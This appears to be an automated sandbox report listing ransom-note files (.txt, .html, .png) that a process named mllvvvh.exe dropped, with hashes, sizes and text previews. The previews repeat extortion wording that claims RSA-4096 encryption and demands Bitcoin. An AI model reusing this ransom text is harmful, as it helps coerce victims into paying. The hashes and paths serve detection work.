                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
